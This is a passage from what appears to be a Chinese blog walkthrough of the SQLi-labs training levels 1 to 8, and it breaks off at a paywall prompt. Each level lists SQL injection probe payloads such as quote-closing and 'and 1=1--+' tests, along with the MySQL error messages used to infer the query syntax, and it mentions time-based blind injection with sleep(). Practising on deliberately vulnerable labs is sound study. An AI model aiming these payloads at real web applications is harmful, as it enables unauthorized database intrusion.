本文详细记录了从基础SQL注入(第一关至第五关)到高级盲注技术(第六至二十关),包括报错盲注、时间延迟利用,以及针对特定情况如布尔类型、头部注入和base64编码的破解方法。通过实例揭示了如何在MySQL环境中实施和防御这些攻击。
目录
第一关:
先用'试试水
id=1'果然发现报错了,直接干
#有返回
?id=1' and 1=1--+
#无返回
?id=1' and 1=2--+第二关:
直接上第一关的payload试试水,改用"也不太行,最后直接不加才知道是数字型
?id=1' and 1=1--+
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near " and 1=1-- LIMIT 0,1' at line 1
?id=1" and 1=1--+
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '" and 1=1-- LIMIT 0,1' at line 1
?id=1 and 1=1--+
?id=1 and 1=2--+第三关:
?id=1 ' and 1=1--+
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
?id=1 " and 1=1--+
?id=1 " and 1=2--+第四关:
?id=1' and 1=1 --+
?id=1" and 1=1 --+
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
#上面报错觉得是'的问题所以用"'
?id=1"' and 1=1 --+
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and 1=2 -- ") LIMIT 0,1' at line 1
#报错看到--后面是"),猜到是")来闭合
?id=1") and 1=1 --+
?id=1") and 1=2 --+第五关(盲注):
?id=1 ' and 1=1--+
?id=1 ' and 1=2--+第六关(盲注):
?id=1
?id=1'
?id=1"
?id=1 " and 1=1--+
?id=1 " and 1=2--+第七关(报错盲注):
?id=1'"
#You have an error in your SQL syntaxYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"')) LIMIT 0,1' at line 1
?id=1 ')) and 1=1--+ #true and true 为 true
?id=1 ')) and 1=2--+ #true and false 为 true
#You have an error in your SQL syntax第八关(时间盲注):
?id=1
?id=1'
?id=1' and 1=1 --+
#You are in...........
?id=1' and 1=2 --+
#什么都不回显,可以使用时间盲注sleep()函数
最低0.47元/天 解锁文章
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
